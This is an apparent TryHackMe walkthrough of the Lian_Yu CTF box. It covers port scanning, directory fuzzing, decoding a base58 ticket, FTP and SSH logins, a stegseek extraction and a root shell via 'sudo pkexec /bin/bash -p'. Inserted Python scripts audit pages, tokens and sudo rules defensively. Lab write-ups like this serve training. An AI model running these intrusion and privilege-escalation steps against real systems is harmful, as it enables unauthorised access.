THM: Lian_Yu
Intro
Lian_Yu is a beginner friendly CTF mostly focused on enumeration. We’ll fuzz a website to find credentials that will get us access to the FTP service. There we’ll find an image file to perform steganalysis on, and that will reveal a password we can use to SSH into the box. Escalating to root from there is just a matter of escaping from a binary we have sudo privileges for.
Recon⌗
rustscan -a 10.10.122.151 -- -sC -sV -oA nmap1
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.2
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRbgwcqyXJ24ulmT32kAKmPww+oXR6ZxoLeKrtdmyoRfhPTpCXdocoj0SqjsETI8H0pR0OVDQDMP6lnrL8zj2u1yFdp5/bDtgOnzfd+70Rul+G7Ch0uzextmZh7756/VrqKn+rdEVWTqqRkoUmI0T4eWxrOdN2vzERcvobqKP7BDUm/YiietIEK4VmRM84k9ebCyP67d7PSRCGVHS218Z56Z+EfuCAfvMe0hxtrbHlb+VYr1ACjUmGIPHyNeDf2430rgu5KdoeVrykrbn8J64c5wRZST7IHWoygv5j9ini+VzDhXal1H7l/HkQJKw9NSUJXOtLjWKlU4l+/xEkXPxZ
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPfrP3xY5XGfIk2+e/xpHMTfLRyEjlDPMbA5FLuasDzVbI91sFHWxwY6fRD53n1eRITPYS1J6cBf+QRtxvjnqRg=
| 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDexCVa97Otgeg9fCD4RSvrNyB8JhRKfzBrzUMe3E/Fn
80/tcp open http syn-ack Apache httpd
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34586/tcp status
| 100024 1 42805/tcp6 status
| 100024 1 57365/udp status
|_ 100024 1 60425/udp6 status
34586/tcp open status syn-ack 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
We can start by checking out the website on port 80. It’s just a single page introducing the theme of the box, but knowledge of Arrowverse isn’t required for the challenge.
Since there isn’t much to go on we can start fuzzing for more content.
ffuf -t 80 -u http://10.10.122.151/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
island [Status: 301, Size: 236, Words: 14, Lines: 8]
Not much here either, but we did find an /island directory.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ curl -i http://10.10.122.151/island/
HTTP/1.1 200 OK
Date: Fri, 04 Jun 2021 13:03:05 GMT
Server: Apache
Last-Modified: Tue, 05 May 2020 15:28:54 GMT
ETag: "159-5a4e84e26c1a0"
Accept-Ranges: bytes
Content-Length: 345
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
With this hint we can start a wordlist, as vigilante could be a username somewhere. Let's fuzz this directory as well.
ffuf -t 80 -u http://10.10.122.151/island/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
2100 [Status: 301, Size: 241, Words: 14, Lines: 8]
Another hidden directory to explore.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ curl -i http://10.10.122.151/island/2100/
HTTP/1.1 200 OK
Date: Fri, 04 Jun 2021 13:08:49 GMT
Server: Apache
Last-Modified: Tue, 05 May 2020 15:06:21 GMT
ETag: "124-5a4e7fd8c8a40"
Accept-Ranges: bytes
Content-Length: 292
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p ali4gn=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
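Both responses above hide their clues in places a browser never renders: an HTML comment, and a heading styled white on a white background. The script below is an added Python example, not part of the original writeup, that pulls those out of a saved response so a site owner can audit their own pages for leaked hints of this kind. The two sample pages are the responses quoted above, embedded here as test input; the list of "hidden" styles is an assumption kept deliberately short.

```python
import re
from html.parser import HTMLParser

# Inline styles that make text invisible on a white page (assumed list; extend for your palette).
HIDDEN_STYLE = re.compile(
    r"(?:color\s*:\s*(?:white|#fff(?:fff)?)\b|display\s*:\s*none|visibility\s*:\s*hidden)",
    re.IGNORECASE,
)


class HintExtractor(HTMLParser):
    """Collect HTML comments and any text inside elements styled to be invisible."""

    def __init__(self):
        super().__init__()
        self.comments = []
        self.hidden_text = []
        self._stack = []        # (tag, hidden) for every open element
        self._hidden_depth = 0  # > 0 while inside at least one hidden element

    def handle_starttag(self, tag, attrs):
        style = dict(attrs).get("style") or ""
        hidden = bool(HIDDEN_STYLE.search(style))
        self._stack.append((tag, hidden))
        if hidden:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        # Pop back to the matching open tag. A close tag with no open partner
        # (like the stray </style> inside the island page's <h2>) is ignored.
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                self._hidden_depth -= sum(1 for _, h in self._stack[i:] if h)
                del self._stack[i:]
                break

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_data(self, data):
        if self._hidden_depth > 0 and data.strip():
            self.hidden_text.append(data.strip())


def extract_hints(html: str) -> dict:
    """Return the comments and hidden text found in one HTML document."""
    parser = HintExtractor()
    parser.feed(html)
    parser.close()
    return {"comments": parser.comments, "hidden_text": parser.hidden_text}


# Sample input: the two responses from the box, as quoted in the writeup.
ISLAND_PAGE = """<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
"""

TICKET_PAGE = """<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p ali4gn=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
"""

if __name__ == "__main__":
    for name, page in (("/island/", ISLAND_PAGE), ("/island/2100/", TICKET_PAGE)):
        print(name, extract_hints(page))
```

Run it against a crawl of your own site before release; anything it reports is content an attacker's fuzzing run will see just as easily as the browser hides it.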
We're given another hint here. Let's fuzz the /2100 directory next, but this time with -e .ticket to look for files with that extension.
green_arrow.ticket [Status: 200, Size: 71, Words: 10, Lines: 7]
Now we’re getting somewhere!
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ curl -i http://10.10.122.151/island/2100/green_arrow.ticket
HTTP/1.1 200 OK
Date: Fri, 04 Jun 2021 13:13:13 GMT
Server: Apache
Last-Modified: Tue, 05 May 2020 14:56:31 GMT
ETag: "47-5a4e7da59cc40"
Accept-Ranges: bytes
Content-Length: 71
This is just a token to get into Queen's Gambit(Ship)
RTy[REDACTED]scX
We have some encoded text, but it's not base64. We can use CyberChef to iterate through different encoding formats until we find one that works. In this case it is base58, and the decoded value looks like it could be a password.
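The CyberChef step above is trial and error, and the same check is easy to script. The following Python code is an added example, not from the original writeup: it implements base58 with the common Bitcoin alphabet (which is what makes a token with no `0`, `O`, `I`, `l`, `+`, `/` or `=` a base58 candidate in the first place), then tries base64 and base58 on a token and keeps only the decodings that come out as printable text. The ticket token itself is redacted on the page, so the sample values here are constructed.

```python
import base64
import binascii

# Bitcoin-style base58 alphabet: no 0, O, I or l, and no +, / or = padding.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(token: str) -> bytes:
    """Decode a base58 string; each leading '1' maps to a leading zero byte."""
    n = 0
    for ch in token:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"{ch!r} is not a base58 character")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(token) - len(token.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here to build test vectors."""
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    n = int.from_bytes(data, "big")
    digits = []
    while n:
        n, rem = divmod(n, 58)
        digits.append(B58_ALPHABET[rem])
    return "1" * leading_zeros + "".join(reversed(digits))


def _printable(data: bytes) -> bool:
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def candidate_decodings(token: str) -> dict:
    """Try the encodings a CTF token commonly uses; keep those that yield printable text."""
    results = {}
    try:
        out = base64.b64decode(token, validate=True)  # strict alphabet and padding
        if _printable(out):
            results["base64"] = out
    except (binascii.Error, ValueError):
        pass
    try:
        out = b58decode(token)
        if _printable(out):
            results["base58"] = out
    except ValueError:
        pass
    return results


if __name__ == "__main__":
    # Constructed sample tokens, not the box's real ticket.
    for sample in ("Cn8eVZg", "aGVsbG8=", "RTy1notreal"):
        print(sample, candidate_decodings(sample))
```

The strict `validate=True` matters: without it, `b64decode` silently drops characters it does not recognise and can "decode" almost any string, which is exactly the kind of false positive a trial-and-error loop needs to avoid.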
Now let's test these creds, assuming vigilante is a username and this is their password.
It doesn’t work for SSH, but it does get us into the FTP service.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/LianYu]
└─$ ftp -v 10.10.122.151
Connected to 10.10.122.151.
220 (vsFTPd 3.0.2)
Name (10.10.122.151:brian): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
226 Directory send OK.
There are 3 image files we can download for further analysis locally, but if we cd .. we'll also learn there is another user, slade, on the box.
ftp> cd ..
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
When you find image files like this in a CTF it's always a good idea to assume there may be some steganography involved. With stegseek -sf aa.jpg we can extract a hidden zip file embedded inside aa.jpg.
[i] --> Found passphrase: "REDACTED"
[i] Original filename: "ss.zip"
[i] Extracting to "aa.jpg.out"
Unzipping that file gives us a text file, shado, that contains a possible password.
Initial Foothold
We can try to SSH into the 2 accounts we know about using the password we just found, and with that we’ll be able to get a shell as slade and grab the user flag.
┌──(brian㉿kali)-[~/…/hacks/tryhackme/LianYu]
└─$ ssh slade@10.10.122.151
slade@10.10.122.151's password:
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
██╗ ██╗███████╗██╗ ██████╗ ██████╗ ███╗ ███╗███████╗██████╗
██║ ██║██╔════╝██║ ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗ ██║ ██║ ██║ ██║██╔████╔██║█████╗ █████╔╝
██║███╗██║██╔══╝ ██║ ██║ ██║ ██║██║╚██╔╝██║██╔══╝ ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝
██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗██╗ ██╗
██║ ██║██╔══██╗████╗ ██║ ╚██╗ ██╔╝██║ ██║
██║ ██║███████║██╔██╗ ██║ ╚████╔╝ ██║ ██║
██║ ██║██╔══██║██║╚██╗██║ ╚██╔╝ ██║ ██║
███████╗██║██║ ██║██║ ╚████║███████╗██║ ╚██████╔╝
╚══════╝╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═════╝ #
slade@LianYu:~$ ls -l
total 4
-r-------- 1 slade slade 63 May 1 2020 user.txt
slade@LianYu:~$ wc -c user.txt
63 user.txt
Privilege Escalation
If we check for sudo permissions we'll see slade can run /usr/bin/pkexec as root (the rule is tagged PASSWD, so sudo only asks for slade's own password), and we can use that to escalate to a root shell!
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ sudo pkexec /bin/bash -p
root@LianYu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LianYu:~# cd /root
root@LianYu:~# ls -l
total 4
-rw-r--r-- 1 root root 340 May 1 2020 root.txt
root@LianYu:~# wc -c root.txt
340 root.txt
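The root cause here is a sudoers rule that hands root to a program which will launch whatever command it is given. The script below is an added Python example, not part of the original writeup, that parses sudo -l output and flags rules granting root (or ALL) to such programs; it is the kind of check a configuration-audit job can run across a fleet. The sample output is the session above, copied in as test input; COMMAND_LAUNCHERS is an assumed, deliberately short list to be extended from your own hardening baseline.

```python
import re

# Programs that give the caller a way to run arbitrary commands once they run as root.
# Assumed short list for this example; extend it from your own baseline.
COMMAND_LAUNCHERS = {"pkexec", "bash", "sh", "dash", "su", "env"}

# One rule line of `sudo -l` output, e.g. "(root) PASSWD: /usr/bin/pkexec"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> list:
    """Return the rule entries from `sudo -l` output as dicts: run-as users, tags, commands."""
    rules = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(root)" or "(root : root)": the part before ':' is the run-as user list
        runas = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"runas": runas, "tags": tags, "commands": cmds})
    return rules


def risky_rules(rules: list) -> list:
    """Flag rules that reach root through a command launcher (or through ALL)."""
    findings = []
    for rule in rules:
        if not any(u in ("root", "ALL") for u in rule["runas"]):
            continue
        for cmd in rule["commands"]:
            program = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
            if program == "ALL" or program in COMMAND_LAUNCHERS:
                findings.append({"command": cmd, "nopasswd": "NOPASSWD" in rule["tags"]})
    return findings


def audit_sudo_l(output: str) -> list:
    return risky_rules(parse_sudo_l(output))


# Sample input: the `sudo -l` output from the box, as shown in the writeup.
SAMPLE_SUDO_L = r"""Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
"""

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE_SUDO_L):
        print("risky sudo rule:", finding)
```

A PASSWD tag does not make such a rule safe: it only requires the user's own password, which is exactly what the attacker already has at this point. The fix is to drop the rule, or to restrict it to the specific command line the user actually needs.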